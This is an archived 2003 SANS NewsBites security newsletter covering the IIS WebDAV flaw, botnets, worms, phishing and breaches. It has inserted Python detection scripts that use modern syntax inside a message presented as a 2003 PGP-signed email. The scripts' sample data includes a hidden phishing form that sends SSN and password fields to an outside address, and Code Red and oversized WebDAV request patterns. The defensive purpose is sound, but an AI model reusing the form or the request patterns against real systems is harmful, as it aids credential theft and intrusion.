SANS NewsBites Vol. 5 Num. 11
From: The SANS Institute (NewsBites at sans.org)
Date: Wed Mar 19 2003 - 09:53:37 CST
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Stephen Northcutt offered this chilling observation about today's
NewsBites: "One of the theories of information warfare is that
you release a number of virus/worms near the front edge of war to
disrupt your enemy. You will notice a number of new worms in this
issue including one directly involved in the India/Pakistan tensions.
Even if these are not related to the current crisis in Iraq, this is
a taste of what to expect on the Internet in the future as countries
prepare for war."
And on a more personal level: If you live near New York, Baltimore,
Washington, Atlanta, San Francisco, London, Colorado Springs, Portland
OR, Raleigh, Monterey CA, Singapore or Melbourne, we will be bringing
a hands-on SANS training program to your area within the next 130
days. If you live elsewhere and can assemble at least 30 students,
we can bring a program to you. See: www.sans.org
Alan
***********************************************************************
SANS NewsBites March 19, 2003 Vol. 5, Num. 11
***********************************************************************
TOP OF THE NEWS
Critical Buffer Overflow Vulnerability in IIS 5.0 on Windows 2000
Bot Networks Could Launch Huge Denial of Service Attacks
UT Student Charged in University Security Breach Case
Man Pleads Guilty to Sandia National Labs Breach
New Twist on Password Stealing Scam
Charges Against Second Bloomberg Extortion Defendant Dropped
THE REST OF THE WEEK'S NEWS
Gold Standard Security Benchmarks Released For Cisco IOS and Solaris
Kerberos Vulnerability Details on Mailing List
Former Employees Allegedly Hacked Company System Through Old
Accounts
W32/Cult-A Worm
Bibrog-B Worm Hides Behind Game, Alters Browsers
Bush Will Name Two to Top DHS Posts
Yaha Variant Released in Hacker Rivalry
Memory Stick Contained Patient Data
Pakistan Establishes Cybercrime Response Center
Piracy Ringleader Indicted
Man Under House Arrest Stole Personal Data
Qatar News Portal Target of Attack
CodeRed Variant in the Wild
CERT/CC Issues Advisory on Weak Password protection on SMB File
Shares
IP Spoofing
The Benefits of Using a Managed Security Services Provider
Worm's Rapid Spread Due in Part to Weak Passwords
Stolen Computer Equipment Contained Personal Data
DOD Commanders Responsible for IT Security
Demo Belies Product's Usefulness
Iraq's ISP Traffic Moves through US and UK Satellite Hookups
SECURITY TRAINING UPDATE
If employees have responsibility for security -- whether as system
administrators or as security officers, analysts, or consultants --
their employer deserves to know that they have mastered the minimum
set of essential skills needed to do the job. Those are the skills
covered in the GIAC Security Essentials course (SANS Track 1) and
examinations. (Track 1 Boot Camp also includes the CISSP CBK.) If
Track 1 is too advanced, SANS Security+ (SANS Track 9) program is a
great starting point. Attend live training in ten cities, mentored
training in thirty more cities, or ask to schedule a course at your
location. Details at http://www.sans.org
****************** This Issue Sponsored by Websense ******************
Deadly Internet Sin #1: LUST
Whether it's adult entertainment, gambling or hacking sites, your
company can't afford to ignore the risk. Limit the liability threat
of Internet misuse by using Websense Enterprise.
A superior database, flexible filtering options, comprehensive
reporting and seamless integration have made Websense the preferred
employee Internet management software of the Fortune 500.
Download a free, 30-day trial! http://www.websense.com?id=NL15887
***********************************************************************
TOP OF THE NEWS
--Critical Buffer Overflow Vulnerability in IIS 5.0 on Windows 2000
(17 March 2003)
Microsoft issued a CRITICAL warning about a buffer overflow flaw in
a WebDAV component of Windows exploited through Internet Information
Server (IIS) version 5.0 running on Windows 2000. Other versions
of Windows are not affected. A tool to exploit the vulnerability
is circulating on the Internet, but Microsoft did not learn of the
vulnerability until after hackers had exploited it. The exploit was
against a US military site. Patches and work-arounds are available.
http://news.com.com/2100-1002-992920.html
http://www.theregister.co.uk/content/55/29795.html
http://www.computerworld.com/securitytopics/security/holes/story/0,10801,79441,00.html
http://www.msnbc.com/news/886524.asp?0cv=TA00
http://www.microsoft.com/technet/security/bulletin/MS03-007.asp
http://www.cert.org/advisories/CA-2003-09.html
SANS, ISS, and Microsoft ran a wonderful "Ask The Experts" web
broadcast Tuesday afternoon answering more than 75 questions about
which systems are and are not vulnerable and what needs to be done to
protect your organization. It is the first one listed on the webcast
archives page at http://www.sans.org/webcasts/archive.php
[Editor's Note (Paller): Fix this one right away. Automated attack
tools and worms are only days away.]
--Bot Networks Could Launch Huge Denial of Service Attacks
(17 March 2003)
At least five large networks of compromised machines have been identified,
each of which could be used to launch massive denial of service attacks. The machines
have had bots placed on them; the bots establish communication with
Internet Relay Chat (IRC) servers to receive commands.
http://www.eweek.com/article2/0,3959,935790,00.asp
[Editor's Note (Paller): These networks have up to 140,000 systems
each. Compare that to the 230 (not 230 thousand) machines needed
to take down an Internet II site, 330 to take down a major US
Intelligence site, and you get an idea how much power is in these
networks. They are more than sufficient to cause widespread outages.
Many of these systems have been compromised by persuading the users to
download a game or picture or other file that must be executed. The
games and pictures are real, but they contain the malicious software
as an extra surprise.]
--UT Student Charged in University Security Breach Case
(14 March 2003)
Christopher Andrew Phillips, a computer science student at the
University of Texas (UT) at Austin, has been charged in connection
with the breach of the university's computer system that
exposed the personal data of over 55,000 people. A grand jury is
investigating the case. If convicted of the charges of unlawful
access to a protected computer and unlawful use of identification,
Phillips could face five years in prison and be ordered to pay $500,000
in restitution.
http://www.siliconvalley.com/mld/siliconvalley/news/editorial/5393600.htm
http://www.washingtonpost.com/wp-dyn/articles/A27370-2003Mar14.html
--Man Pleads Guilty to Sandia National Labs Breach
(14 March 2003)
An 18-year-old Pakistani man has pleaded guilty to computer and
credit card fraud charges. Adil Yahya Zakaria Shakour breached
security at the Sandia National Laboratories' computer network and
he defaced an Eglin Air Force Base web site. He also broke into a
computer system at a North Carolina-based tax forms company and stole
credit card information that he used to buy $7,000 worth of goods.
Shakour faces deportation after a possible 15-year prison sentence;
he will also have to pay restitution in the amount of $100,000.
Sentencing is set for June 12.
http://www.washingtonpost.com/wp-dyn/articles/A23590-2003Mar14.html
--New Twist on Password Stealing Scam
(13/14 March 2003)
Discover cardholders are the latest target in password stealing scams.
Customers have been receiving e-mail messages telling them their
accounts have been put on hold due to inactivity, and that in order
to reactivate their accounts, they must log in to the account;
responses to the message are sent to a Russian Internet address.
Information collected includes plenty of identifiers that would enable
identity theft: social security number, mother's maiden name, account
number and passwords. PayPal and eBay customers have been targeted
by similar scams. This scheme's method is different: the e-mail
linked to a genuine Discover site, but the login form was wrapped in
a hidden form so that the information customers submitted was sent to
the attacker rather than to Discover.
http://www.msnbc.com/news/884810.asp
http://www.computerworld.com/securitytopics/security/cybercrime/story/0,10801,79380,00.html
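One check a mail gateway or a browser-side inspector can run for the trick described above, as an added example that is not drawn from the article or from Discover: it collects the forms on a page and flags any whose action resolves to a host other than the page's own, which is exactly what a "real page, wrapped form" scam depends on. The page URL (PAGE_URL) and the HTML (SAMPLE_HTML) are constructed for illustration; no real Discover markup is reproduced.

```python
"""Flag forms on a page that submit their fields to a host other than the page's own.

Added example for the Discover phishing story. PAGE_URL and SAMPLE_HTML are
constructed; they are not real bank pages.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

PAGE_URL = "https://www.example.com/account/login"   # constructed page location

SAMPLE_HTML = """
<html><body>
<form action="/account/login" method="post">
  <input type="text" name="user"><input type="password" name="pass">
</form>
<div style="display:none">
<form action="http://203.0.113.5/collect.cgi" method="post">
  <input type="text" name="ssn"><input type="text" name="mmn">
  <input type="password" name="password">
</form>
</div>
</body></html>
"""


class FormCollector(HTMLParser):
    """Record every <form> action together with the names of its text/password fields."""

    def __init__(self):
        super().__init__()
        self.forms = []        # list of {"action": str, "fields": [input names]}
        self._current = None   # form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "fields": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            # only the fields a victim types into matter for credential theft
            if (a.get("type") or "text").lower() in ("password", "text"):
                self._current["fields"].append(a.get("name") or "")

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def offsite_forms(page_url, html):
    """Return the forms whose resolved action host differs from the page's host.

    A relative or empty action resolves to the page itself and is not reported;
    an action with no host at all (e.g. a javascript: URL) is reported, since
    it cannot be shown to deliver the fields to the site the user sees.
    """
    parser = FormCollector()
    parser.feed(html)
    page_host = urlparse(page_url).hostname
    findings = []
    for form in parser.forms:
        target = urljoin(page_url, form["action"])
        if urlparse(target).hostname != page_host:
            findings.append({"action": target, "fields": form["fields"]})
    return findings


if __name__ == "__main__":
    for f in offsite_forms(PAGE_URL, SAMPLE_HTML):
        print("form posts off-site to", f["action"], "with fields", f["fields"])
```

The check is a heuristic, not proof: a page that legitimately posts to a separate login host will trip it, and a scam that proxies through a same-host script will not. It is most useful as a triage signal on pages that carry password fields.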
--Charges Against Second Bloomberg Extortion Defendant Dropped
(10 March 2003)
Charges against Igor Yarimaka, an alleged accomplice in the Bloomberg
extortion case, have been dropped because the evidence against him was
weak. Oleg Zezov was recently convicted and faces a prison sentence
of up to 20 years. The two allegedly tried to exact a payment of
$200,000 in return for keeping quiet about vulnerabilities in the
Bloomberg financial company's computer system.
http://www.theregister.co.uk/content/55/29674.html
************************ SPONSORED LINKS ******************************
Privacy notice: These links redirect to non-SANS web pages.
(1) FOIL NETWORK ATTACKS BEFORE THEY'RE LAUNCHED! Automatically
prevent intrusions. FREE DEMO.
http://www.sans.org/cgi-bin/sanspromo/NB146
(2) Delegate root privileges with PowerBroker(r) - described as "sudo
on steroids".
http://www.sans.org/cgi-bin/sanspromo/NB147
(3) 30% of the Global 100 use Permeo to secure their applications.
Do you?
http://www.sans.org/cgi-bin/sanspromo/NB148
***********************************************************************
THE REST OF THE WEEK'S NEWS
--Gold Standard Security Benchmarks Released For Cisco IOS and Solaris
Two additional Gold Standard configurations have been agreed upon by
the US General Services Administration (GSA), National Institute of
Standards and Technology (NIST), Defense Information Systems Agency
(DISA), and National Security Agency (NSA), along with the many
corporate and international members of the Center for Internet
Security (CIS). These cover the most popular routers (Cisco) and
the most popular version of UNIX (Solaris). An updated benchmark
for Windows 2000 was also released. The benchmarks and associated
automated scoring tools are available for download free of charge
from the CIS web site.
http://www.cisecurity.org
[Editor's Note (Paller): Over the next few months you'll begin to
see major system vendors beginning to deliver systems configured
in accordance with the Center for Internet Security benchmarks.
Buying and deploying safely configured systems is the first step in
reducing the danger from massive worms, and will, I believe, quickly
become a minimum standard of due care.]
--Kerberos Vulnerability Details on Mailing List
(17 March 2003)
Details of a vulnerability in the Kerberos v4 authentication protocol
were leaked to a mailing list; the author of the original paper
asked administrators to remove the information, but they refused.
The author later posted the details himself. The vulnerability allows
attackers to "impersonate any principal in a given realm."
http://www.eweek.com/article2/0,3959,937380,00.asp
--Former Employees Allegedly Hacked Company System Through Old Accounts
(15 March 2003)
The computer system at LapLink, a software company, was allegedly
hacked by two former employees who used accounts that hadn't been
deleted. The attack caused the e-mail system to go down and apparently
deleted crucial files. LapLink CEO Mark Eppley reportedly plans to
file charges.
http://seattletimes.nwsource.com/html/businesstechnology/134653561_laplink150.html
--W32/Cult-A Worm
(14 March 2003)
The W32/Cult-A worm arrives as a .pdf attachment purporting to be a
greeting card; it also includes a Trojan horse program. It spreads
via random e-mail addresses and through KaZaA peer-to-peer network
file sharing. If the attachment is launched, the worm generates a
false error message and installs itself as windowsupdate.exe in the
Windows System folder to ensure it is run on startup. Cult also
connects to an IRC server to listen for more instructions.
http://www.pcpro.co.uk/?http://www.pcpro.co.uk/news/news_story.php?id=39554
--Bibrog-B Worm Hides Behind Game, Alters Browsers
(14 March 2003)
The Bibrog-B worm arrives as an attachment. It appears to be a
shooting game, but while the game is running, the worm is dropping
its payload: it copies itself to the infected machine's hard drive
and sends itself out to all addresses in the Outlook address book
or through file sharing. In what is probably an attempt to harvest
personal information, Bibrog-B also alters browsers on infected
machines so that they will display phony versions of real websites.
http://www.theregister.co.uk/content/56/29768.html
http://www.sophos.com/virusinfo/analyses/w32bibrogb.html
[Editor's Note (Paller): If you are responsible for security awareness
in your organization, get this story (and the previous one) to all
your coworkers and emphasize that their children do not know the
difference between safe games and infected games. And if you are
using VPNs, an infected PC system is a perfect hacker access point
to your most important information systems. Infected machines
brought from home to work can infect all your corporate systems.
If your coworkers are allowing their children to use their business
computers, or if they are downloading games and pictures themselves,
they may be putting your entire network at risk. Tens of thousands
of systems are being taken over through such ruses every month. Your
coworkers will not know about this risk unless you tell them.]
--Bush Will Name Two to Top DHS Posts
(13 March 2003)
The Bush administration has announced that it will fill
two top positions at the new Department of Homeland Security
(DHS). Robert Liscouski, director of information assurance for
the Coca-Cola Corporation, will be named assistant secretary of
infrastructure protection; Liscouski is presently director of the CIA's
Intelligence Science Board. Paul Redmond, who was formerly chief
of CIA counterintelligence, will become the assistant secretary for
information analysis. To date, no one has been named to head the DHS's
Information Analysis and Infrastructure Protection (IAIP) directorate.
http://www.washingtonpost.com/wp-dyn/articles/A21843-2003Mar13.html
http://www.fcw.com/fcw/articles/2003/0310/web-home-03-14-03.asp
--Yaha Variant Released in Hacker Rivalry
(13 March 2003)
A group of Indian hackers has released a new variant of the Yaha worm
that launched denial of service attacks on a handful of prominent
Pakistani sites. Yaha-Q arrives as an attachment or through shared
network drives. It tries to disable anti-virus software, places a
backdoor on systems it infects and sends itself out to addresses in
the address book. The worm also stores insulting messages about a
rival Pakistani hacking group.
http://www.reuters.com/newsArticle.jhtml?type=topNews&storyID=2371420
http://www.wired.com/news/infostructure/0,1377,58026,00.html
--Memory Stick Contained Patient Data
(13 March 2003)
A woman who bought a portable memory stick that was supposed to be new
found that it actually contained personal information about 13 cancer
patients from the Royal Bolton Hospital in Lancashire (UK). Hospital
officials say they will contact people affected by the information
leak and will take steps to ensure that it doesn't happen again.
http://www.theregister.co.uk/content/55/29752.html
[Editor's Note (Ranum): Making sure sensitive data is deleted off
of media is going to be a huge problem in the future. It opens the
question of who gets access to what, and how we make sure they do the
right thing with the data, following. Browser-enabled applications
seldom do the right thing with cached sensitive information that may
be exposed on a hard drive. It's amazing what you can find on a hard
disk these days.]
--Pakistan Establishes Cybercrime Response Center
(13 March 2003)
Pakistan's decision to establish the National Response Center for
Cybercrimes was spurred by the fact that US investigators had to be
brought in to help find the source of the e-mails sent by journalist
Daniel Pearl's kidnappers. The center was established at the
headquarters of a Pakistani intelligence agency.
http://www.cnn.com/2003/TECH/internet/03/13/pakistan.cyber.ap/index.html
--Piracy Ringleader Indicted
(12 March 2003)
An Australian man who is alleged to be the ringleader of an Internet
piracy group has been indicted by a federal grand jury in Connecticut.
US Attorney Paul McNulty said his office is seeking to extradite Hew
Raymond Griffiths, who could face a ten-year prison sentence and a
$500,000 fine if convicted of the charges against him.
http://news.com.com/2100-1028-992373.html
--Man Under House Arrest Stole Personal Data
(12 March 2003)
A Florida man who was already under house arrest related to fraudulent
identification use and drug possession charges was arrested and placed
in custody on charges of having stolen personal information belonging
to more than 2,000 people. Sirvon Thomas used the information to
open lines of credit and purchase goods that he sold on eBay, but
never delivered. Thomas is being held without bail.
http://www.usatoday.com/tech/news/2003-03-12-net-theft_x.htm
--Qatar News Portal Target of Attack
(12 March 2003)
Abdulaziz Al Mahmoud, the chief editor of Qatar's first news portal, Al
Jazeera Net, says that the website has been under attack. The attack
attempted to exhaust the site's bandwidth; Abdulaziz added that the
attacker has not succeeded. He called the attack "professional," and said
an attack of that sophistication could have been launched only by
an organization, because one individual could not have the necessary
resources.
http://www.thepeninsulaqatar.com/Display_news.asp?section=Local_News&month=March2003&file=Local_News2003031271650.xml
[Editors' Note (Multiple): Individuals can and do assemble large
networks of slave computers. The network can include far more computing
resources than can be found in many large organizations.]
--CodeRed Variant in the Wild
(11/12 March 2003)
A new version of Code Red, dubbed CodeRed.F, has been spreading
across the Internet. It exploits the same Internet Information Server
(IIS) vulnerability that the original CodeRed did to create a buffer
overflow on unpatched servers and search for more vulnerable servers.
This version also installs a Trojan horse program on infected systems,
and does not have a shut-off date. CodeRed.F spreads the first 19
days of each month, then launches a daylong attack against the White
House domain, and then shuts off. People who have not patched IIS
vulnerabilities are strongly urged to do so.
http://www.eweek.com/article2/0,3959,924269,00.asp
http://www.computerworld.com/securitytopics/security/story/0,10801,79267,00.html
Relevant Microsoft Bulletins:
http://www.microsoft.com/technet/security/bulletin/MS01-033.asp
http://www.microsoft.com/technet/security/bulletin/MS01-044.asp
[Editor's Note (Shpantzer): There's a background radiation of 60,000
IIS machines scanning on behalf of Code Red, at any given time. That's
a sad commentary on the state of IIS server administration, considering
that Code Red is almost two years old.
(Schultz): With all the information, patches, and tools now available
for securing IIS servers, there is really no excuse for anyone's
machine becoming infected by this new, relatively unimaginative
variant of Code Red.]
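A log check that covers both IIS items in this issue (the MS03-007 WebDAV overflow at the top of the newsletter and the Code Red family's .ida requests above), as an added example that is not taken from the advisories or from Microsoft: it parses IIS W3C extended log lines and flags WebDAV methods carrying an oversized URI, ordinary WebDAV use (relevant if the workaround of disabling WebDAV is in force), and any request for an .ida or .idq ISAPI resource. The log lines are constructed, the oversized request is shortened, and URI_LIMIT is an assumed threshold, not a value from either bulletin. An overflow-length request may not be logged intact, so this check finds probes and reconnaissance more reliably than a successful exploit; the real control is the patch or disabling WebDAV.

```python
"""Flag IIS requests matching the two attack patterns discussed in this issue:
WebDAV methods with an oversized URI (MS03-007 style) and requests for .ida/.idq
ISAPI resources (the Code Red family, MS01-033).

Added example. SAMPLE_LOG is constructed, not from a real server; URI_LIMIT is an
assumption, not a value from the advisories.
"""
import re

WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE",
                  "LOCK", "UNLOCK", "SEARCH"}
URI_LIMIT = 4096                    # assumed: legitimate WebDAV URIs are far shorter
IDA_RE = re.compile(r"\.id[aq]$", re.IGNORECASE)

LONG_URI = "/" + "A" * 5000         # constructed stand-in for an oversized request
SAMPLE_LOG = (
    "#Software: Microsoft Internet Information Services 5.0\n"
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status\n"
    "2003-03-18 10:01:02 192.0.2.10 GET /index.htm - 200\n"
    "2003-03-18 10:01:09 192.0.2.10 PROPFIND /docs/ - 207\n"
    f"2003-03-18 10:02:31 198.51.100.7 SEARCH {LONG_URI} - 500\n"
    "2003-03-18 10:03:00 203.0.113.9 GET /default.ida XXXXXXXXXXXX%u9090 200\n"
)


def parse_w3c(log_text):
    """Yield one dict per request, using the #Fields: directive for column names."""
    fields = None
    for raw in log_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue                     # other directives (#Software, #Date, ...)
        if fields is None:
            raise ValueError("log data before #Fields: directive")
        parts = line.split()
        if len(parts) != len(fields):
            continue                     # truncated line: skip rather than misalign columns
        yield dict(zip(fields, parts))


def classify(entry):
    """Return a reason string if the request matches an attack pattern, else None."""
    method = entry.get("cs-method", "").upper()
    stem = entry.get("cs-uri-stem", "")
    query = entry.get("cs-uri-query", "-")
    uri_len = len(stem) + (0 if query == "-" else 1 + len(query))
    if IDA_RE.search(stem):
        return "ida-isapi"               # Code Red family probe or infection attempt
    if method in WEBDAV_METHODS and uri_len > URI_LIMIT:
        return "webdav-oversized"        # MS03-007 style request
    if method in WEBDAV_METHODS:
        return "webdav"                  # plain WebDAV use; should be absent if disabled
    return None


def scan_log(log_text):
    """Return [(c-ip, cs-method, reason)] for every suspicious request, in log order."""
    hits = []
    for entry in parse_w3c(log_text):
        reason = classify(entry)
        if reason:
            hits.append((entry["c-ip"], entry["cs-method"], reason))
    return hits


if __name__ == "__main__":
    for ip, method, reason in scan_log(SAMPLE_LOG):
        print(f"{ip:16} {method:9} {reason}")
```

Run it against a day's log after applying MS03-007: any "webdav" hit on a server where WebDAV was supposedly disabled means the workaround did not take, and a steady stream of "ida-isapi" hits from the same sources is the Code Red background scanning the editors describe.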
--CERT/CC Issues Advisory on Weak Password protection on SMB File
Shares
(11 March 2003)
The Computer Emergency Response Team Coordination Center (CERT/CC)
has released an advisory warning of an increased number of systems
running Windows 2000 and XP being exploited due to weak password
protection on Server Message Block (SMB) file shares. Tools used
in the exploits include W32/Deloder, GT-bot, sdbot and W32/Slackor.
Gaining administrator level control could let attackers access,
alter and delete files, install malicious software or launch attacks
on other sites. The tools' scanning activity could also increase
network traffic to a point that performance could deteriorate.
Users are urged to disable file sharing, employ strong passwords and
keep up to date with anti-virus signatures.
http://www.cert.org/advisories/CA-2003-08.html
http://www.nwfusion.com/news/2003/0312windobroad.html
--IP Spoofing
(11 March 2003)
This article provides an overview of the history of IP spoofing,
describes a variety of spoofing attacks and offers ideas on defending
against IP spoofing, including router-level filtering, encryption and
authentication.
http://www.securityfocus.com/infocus/1674
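The router-level filtering the article recommends, as an added example that is not from the article: a BCP 38 style ingress/egress decision written out in Python so the rules are explicit. It drops inbound packets on the outside interface that claim an internal or bogon source, and drops outbound packets whose source is not one of the site's own prefixes, so local hosts cannot spoof other people's addresses. The interfaces, prefixes and packets are constructed; make_filter and BOGON_NETS are names chosen here, not router features.

```python
"""BCP 38 style ingress/egress filtering decision for a border router.

Added example. Interface names, prefixes and packets are constructed; this is a
model of the decision a router ACL makes, not a replacement for one.
"""
import ipaddress

# Sources that should never appear on a packet arriving from the Internet.
BOGON_NETS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/4", "240.0.0.0/4",
)]


def make_filter(internal_nets, outside_iface="eth0"):
    """Return decide(iface, src) -> (action, reason).

    internal_nets: the prefixes that legitimately live behind this router.
    Inbound on outside_iface: drop sources that claim an internal prefix
    (classic spoofing of a trusted inside address) or a bogon.
    Outbound on any other interface: drop sources that are not ours
    (egress filtering; keeps our hosts from spoofing others).
    """
    nets = [ipaddress.ip_network(n) for n in internal_nets]

    def is_internal(addr):
        return any(addr in n for n in nets)

    def decide(iface, src):
        src_ip = ipaddress.ip_address(src)
        if iface == outside_iface:
            if is_internal(src_ip):
                return ("drop", "inbound packet claims internal source")
            if any(src_ip in n for n in BOGON_NETS):
                return ("drop", "inbound packet from bogon source")
            return ("accept", "inbound")
        if not is_internal(src_ip):
            return ("drop", "outbound packet with non-local source")
        return ("accept", "outbound")

    return decide


def filter_packets(decide, packets):
    """Apply decide() to (iface, src) pairs; return [(iface, src, action, reason)]."""
    return [(iface, src) + decide(iface, src) for iface, src in packets]


# Constructed traffic: site prefix 192.0.2.0/24, eth0 outside, eth1 inside.
SAMPLE_PACKETS = [
    ("eth0", "198.51.100.7"),   # ordinary inbound
    ("eth0", "192.0.2.5"),      # spoofed: our own address arriving from outside
    ("eth0", "10.1.2.3"),       # bogon from outside
    ("eth1", "192.0.2.5"),      # ordinary outbound
    ("eth1", "198.51.100.7"),   # an inside host spoofing someone else
]

if __name__ == "__main__":
    decide = make_filter(["192.0.2.0/24"])
    for iface, src, action, reason in filter_packets(decide, SAMPLE_PACKETS):
        print(f"{iface} {src:15} {action:6} {reason}")
```

The inbound rule protects you; the outbound rule protects everyone else, and it is the one most sites forget. Neither helps against spoofing from outside your prefix aimed at third parties, which is why the article also pairs filtering with authentication above the IP layer.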
--The Benefits of Using a Managed Security Services Provider
(11 March 2003)
Paul Castellano and John McGillick of Allegheny Energy Inc. explain
the benefits of using a managed security service provider (MSSP) to
monitor intrusion detection systems (IDS). While they had initially
tried in-house monitoring of their IDS, they became overwhelmed by
the resources they needed and by the volume of false positive alerts.
MSSPs provide the resources, knowledge and support necessary for
effectively monitoring an IDS.
http://www.computerworld.com/securitytopics/security/story/0,10801,79255,00.html?nas=SEC-79255
--Worm's Rapid Spread Due in Part to Weak Passwords
(11 March 2003)
The rapid spread of the Deloder worm can be blamed in part on poor
security practices, including passwords that are easy to guess.
Deloder and another worm, FunLove, both use lists of passwords as
a means of breaking into computers. In addition to strengthening
passwords, users would be well advised to block file sharing.
http://zdnet.com.com/2100-1105-991844.html
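Detection logic for the password-guessing pattern behind both the CERT/CC advisory on SMB shares and the Deloder story above, as an added example not taken from either source: a burst of failed network logons from one source against one account inside a short window, with a later success from the same source marking a probable compromise. The log lines are constructed in a simplified "date time source account outcome" form, not the Windows event-log layout, and THRESHOLD and WINDOW are assumed values.

```python
"""Spot the logon pattern a worm such as Deloder produces when it walks a
password list against a share: many failures from one source against one
account in a short window, sometimes followed by a success.

Added example. SAMPLE_LOG is constructed in a simplified form (not the
Windows event-log layout); THRESHOLD and WINDOW are assumed values.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

THRESHOLD = 5                    # failures from one source against one account ...
WINDOW = timedelta(seconds=60)   # ... inside this window raise an alert

SAMPLE_LOG = """\
2003-03-10 14:00:01 198.51.100.7 Administrator FAIL
2003-03-10 14:00:02 198.51.100.7 Administrator FAIL
2003-03-10 14:00:02 198.51.100.7 Administrator FAIL
2003-03-10 14:00:03 198.51.100.7 Administrator FAIL
2003-03-10 14:00:03 198.51.100.7 Administrator FAIL
2003-03-10 14:00:04 198.51.100.7 Administrator SUCCESS
2003-03-10 14:05:00 192.0.2.20 jsmith FAIL
2003-03-10 14:05:30 192.0.2.20 jsmith SUCCESS
2003-03-10 15:10:00 203.0.113.9 Administrator FAIL
2003-03-10 15:12:00 203.0.113.9 Administrator FAIL
2003-03-10 15:14:00 203.0.113.9 Administrator FAIL
2003-03-10 15:16:00 203.0.113.9 Administrator FAIL
2003-03-10 15:18:00 203.0.113.9 Administrator FAIL
"""


def parse(log_text):
    """Yield (timestamp, source, account, outcome); skip malformed lines."""
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        ts = datetime.strptime(parts[0] + " " + parts[1], "%Y-%m-%d %H:%M:%S")
        yield ts, parts[2], parts[3], parts[4]


def detect(log_text, threshold=THRESHOLD, window=WINDOW):
    """Return [(source, account, failures_in_window, success_after_burst)]."""
    recent = defaultdict(deque)      # (src, account) -> timestamps of recent failures
    alerted = {}                     # (src, account) -> index into alerts
    alerts = []
    for ts, src, account, outcome in parse(log_text):
        key = (src, account)
        if outcome == "FAIL":
            q = recent[key]
            q.append(ts)
            while q and ts - q[0] > window:      # slide the window forward
                q.popleft()
            if len(q) >= threshold and key not in alerted:
                alerted[key] = len(alerts)
                alerts.append([src, account, len(q), False])
        elif outcome == "SUCCESS" and key in alerted:
            # a success after a guessing burst is the signal that matters most
            alerts[alerted[key]][3] = True
    return [tuple(a) for a in alerts]


if __name__ == "__main__":
    for src, account, n, compromised in detect(SAMPLE_LOG):
        state = "SUCCEEDED" if compromised else "ongoing"
        print(f"{src} guessed {account}: {n} failures in window, {state}")
```

In the constructed data the 203.0.113.9 source never trips the 60-second window because it guesses once every two minutes; a slow attacker evades any short window, so the counter is a complement to the advisory's actual fixes (strong passwords, shares disabled or blocked at the border), not a substitute.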
--Stolen Computer Equipment Contained Personal Data
(11 March 2003)
Following the theft of computer equipment from the British Columbia
(Canada) Ministry of Human Resources, 568 people have received letters
cautioning them to keep tabs on their banking and credit card accounts.
While the thieves were likely after the equipment rather than the
information it holds, the potential exposure of social insurance
numbers, birth dates and addresses is cause for concern. Police are
investigating. Several weeks ago, a computer hard drive at a company
in Regina that contained personal details of more than one million
people was stolen. That hardware has been recovered.
http://www.globetechnology.com/servlet/story/RTGAM.20030311.wdata311/GTStory
--DOD Commanders Responsible for IT Security
(10 March 2003)
DOD Instruction 8500.2 makes individual commanders responsible for
the security of the information that passes through their information
systems. The instruction aims to ensure all military and civilian
personnel receive appropriate education and training pertinent to
their information systems responsibilities. The DOD's information
assurance directorate and its CIO will now develop criteria against
which to measure compliance.
http://www.fcw.com/fcw/articles/2003/0310/news-dod-03-10-03.asp
--Demo Belies Product's Usefulness
(10 March 2003)
In the Security Manager's Journal, Vince Tuesday describes a software
vendor's revealing presentation. Vince was looking for solutions to
two challenges: managing the data generated by intrusion detection
systems, firewalls, anti-virus applications and the like, and moving
into the arena of anomalous behavior detection. Although the product
seemed appealing at first, a demonstration made clear the fact that
it created more work instead of streamlining an already cumbersome
process.
http://www.computerworld.com/securitytopics/security/story/0,10801,79109,00.html?nas=SEC-79109
--Iraq's ISP Traffic Moves through US and UK Satellite Hookups
(6 March 2003)
It appears that Iraq's only Internet service provider (ISP) sends and
receives nearly all of its traffic through satellite hookups provided
by companies in the US and the UK. This may violate a US executive
order prohibiting the export of "goods, technology or services" to
Iraq, and a UN embargo that bars member nations from conducting
business with Iraq. In any case, the US and UK governments could
ask the companies to halt service to Iraq, thus depriving the country
of e-mail and web access.
http://www.ds-osac.org/view.cfm?KEY=7E4457434756&type=2B170C1E0A3A0F162820
===end===
NewsBites Editorial Board:
Kathy Bradford, Dorothy Denning, Roland Grefer, Stephen Northcutt,
Alan Paller, Marcus Ranum, Eugene Schultz, Gal Shpantzer
Guest Editor: Bruce Schneier
Please feel free to share this with interested parties via email,
but no posting is allowed on web sites. For a free subscription,
(and for free posters) visit http://www.sans.org/sansnews/
To update your address, visit http://www.sans.org/sansurl and enter
your SD number (from the header of this email.) You will receive your
personal URL via email.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
iD8DBQE+eIYN+LUG5KFpTkYRAmdzAJ9YrZ/SItovURMTi0VePhruTM/i+gCfeSI3
NC3Jz5IhEsRz2RQAZgZx+sw=
=PWfd
-----END PGP SIGNATURE-----